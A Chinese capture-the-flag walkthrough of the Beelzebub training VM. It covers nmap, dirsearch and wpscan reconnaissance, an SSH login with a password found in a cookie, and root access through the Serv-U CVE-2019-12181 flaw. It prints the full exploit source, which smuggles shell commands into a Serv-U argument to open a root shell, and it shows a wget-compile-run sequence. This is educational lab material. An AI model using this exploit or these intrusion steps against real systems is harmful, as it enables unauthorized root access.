准备步骤:
靶机:Beelzebub ip地址:192.168.111.136
攻击机:kali ip地址:192.168.111.130
Vmware下NAT模式连接
一、进行信息收集
1、使用nmap命令扫网段
发现目标ip——192.168.111.136
2、对目标ip进行详细的扫描
发现开放了22和80两个端口,考虑能不能通过爆破22号端口来取得shell?
3.尝试爆破
利用user&pass.txt字典,为了防止电脑跑烂掉选择admin,user等较常用用户名写入user.list进行爆破尝试
4.开放80端口,进行访问192.168.111.136
5. 使用dirsearch工具进行目录的扫描
-u参数指定url
dirsearch -u http://192.168.111.136
6.根据扫描结果开始访问,从index.php开始
发现现实404 not found,咱也不敢问,先来查看一下网页的源代码
根据密码学经验,发现md5加密出现在绿字部分,目测应该是线索 ,先对这句话进行一个翻译
好的,至少我们知道它就是用md5算法进行加密的
7.对“beelzebub”进行md5解密
8.尝试访问
发现网页跳转到192.168.1.6
我们加上md5对网页进行第二次扫描
发现wp的目录
关于wp:
- 第一个也是最简单的定义是WordPress是您可以安装并用于创建博客,应用程序,网站等的软件。
- 第二个更复杂的定义是WordPress是CMS或内容管理系统 。 现在,从该描述中,我认为您可以推断出它是用于管理内容的。
本质上,WordPress为您提供了一个与世界共享内容的平台。 它为您提供了有效而轻松地执行此操作所需的工具。
归根结底wp就是一款php语言开发的博客系统
二、信息利用
9.利用wpscan 对WordPress 网站漏洞扫描
关于wpscan:
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞,最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress,值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能- 该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息,同时还可以实现对未加防护的
Wordpress站点暴力破解用户名密码。
相当于配套使用,发现wordpress目录,就直接利用wpscan进行扫描看看有无漏洞可以利用
使用wpscan扫描用户:
命令:wpscan --url http://dc-2 --enumerate u #暴力枚举用户名。
命令2:wpscan --ignore-main-redirect --url 192.168.4.128 --enumerate u --force
wpscan --update
更新成功才可以使用wpscan对WordPress网站进行扫描
得到两个用户——valak krampus
还有三个子目录
一个个尝试访问,发现只有/wp-content/uploads/可以访问
点击2021/文件夹,发现了一堆图片文件
好像没有什么发现,我们注意到 Talk To VALAK文件夹,valak为wpscan所得到的用户
随便输入一个名字,发现cookies中得到密码:M4k3Ad3a1
10.尝试用ssh登录靶机
发现valak无法登录
使用krampus登陆成功!
三、提权
krampus@beelzebub:~$ id
uid=1000(krampus) gid=1000(krampus) groups=1000(krampus),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare)
krampus@beelzebub:~$ ll
ll: command not found
krampus@beelzebub:~$ ls -la
total 104
drwsrwxrwx 17 krampus krampus 4096 Mar 20 2021 .
drwxr-xr-x 3 root root 4096 Mar 16 2021 ..
-rw------- 1 krampus krampus 1412 Mar 13 23:02 .bash_history
drwx------ 11 krampus krampus 4096 Mar 20 2021 .cache
drwxrwxrwx 14 krampus krampus 4096 May 26 2020 .config
drwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .dbus
drwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Desktop
drwxrwxrwx 2 krampus krampus 4096 Apr 8 2020 Documents
drwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Downloads
drwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .gnupg
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 .gvfs
-rwxrwxrwx 1 krampus krampus 12844 Mar 20 2021 .ICEauthority
drwxr-xr-x 3 krampus krampus 4096 Mar 19 2021 .local
drwxrwxrwx 5 krampus krampus 4096 Apr 2 2020 .mozilla
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Music
drwxrwxrwx 2 krampus krampus 4096 Oct 21 2019 Pictures
-rwxrwxrwx 1 krampus krampus 807 Oct 20 2019 .profile
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Public
-rwxrwxrwx 1 krampus krampus 66 Oct 20 2019 .selected_editor
-rw-rw-r-- 1 krampus krampus 83 May 26 2020 .Serv-U-Tray.conf
-rwxrwxrwx 1 krampus krampus 0 Oct 20 2019 .sudo_as_admin_successful
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Templates
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Videos
-rw-rw-r-- 1 krampus krampus 173 Mar 20 2021 .wget-hsts
发现历史命令文件,cat一下
wget https://www.exploit-db.com/download/47009
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
发现下载文件的历史,我们重新下载这个文件
──(root💀kali)-[~]
└─# ls
47009 cs4.0 dirsearch hydra.restore id_rsa ip.list ip.text test.txt zuizui.exe
┌──(root💀kali)-[~]
└─# cat 47009
/*CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.devto compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe*/
#include <stdio.h>
#include <unistd.h>
#include <errno.h>int main()
{
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
// if execv is successful, we won't reach here
printf("ret val: %d errno: %d\n", ret_val, errno);
return errno;
}
啥都不会看到加粗字体的编码应该也能想到木马,漏洞等等
这是个提权漏洞,试试在靶机上能否运行
提权成功
519
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
